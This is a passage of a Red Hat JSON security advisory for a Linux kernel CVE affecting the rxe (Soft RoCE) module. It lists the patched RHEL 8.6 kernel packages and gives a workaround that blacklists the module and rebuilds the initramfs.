          "summary": "https://lore.kernel.org/linux-cve-announce/2025061847-CVE-2025-38024-2904@gregkh/T",
          "url": "https://lore.kernel.org/linux-cve-announce/2025061847-CVE-2025-38024-2904@gregkh/T"
        }
      ],
      "release_date": "2025-06-18T00:00:00+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-03-25T00:45:50+00:00",
          "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
          "product_ids": [
            "BaseOS-8.6.0.Z.AUS:bpftool-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-0:4.18.0-372.185.1.el8_6.src",
            "BaseOS-8.6.0.Z.AUS:kernel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.AUS:kernel-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-doc-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.AUS:kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:python3-perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.src",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-aarch64-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-ppc64le-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-s390x-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-doc-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-core-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-devel-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-modules-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:bpftool-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-0:4.18.0-372.185.1.el8_6.src",
            "BaseOS-8.6.0.Z.TUS:kernel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.TUS:kernel-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-doc-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.TUS:kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:python3-perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64"
          ],
          "restart_required": {
            "category": "machine"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:5691"
        },
        {
          "category": "workaround",
          "details": "To mitigate this issue, prevent the `rxe` kernel module from loading. This can be achieved by creating a blacklist rule.\n\n1. Create a file `/etc/modprobe.d/blacklist-rxe.conf` with the following content:\n```\nblacklist rxe\ninstall rxe /bin/true\n```\n2. Rebuild the initial ramdisk:\n```bash\ndracut -f -v\n```\n3. Reboot the system for the changes to take effect.\n\nWarning: Blacklisting the `rxe` module may impact functionality that relies on Soft RoCE.",
          "product_ids": [
            "BaseOS-8.6.0.Z.AUS:bpftool-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-0:4.18.0-372.185.1.el8_6.src",
            "BaseOS-8.6.0.Z.AUS:kernel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.AUS:kernel-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-doc-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.AUS:kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:python3-perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.src",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-aarch64-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-ppc64le-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-s390x-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-doc-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-core-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-devel-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-modules-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.s390x",
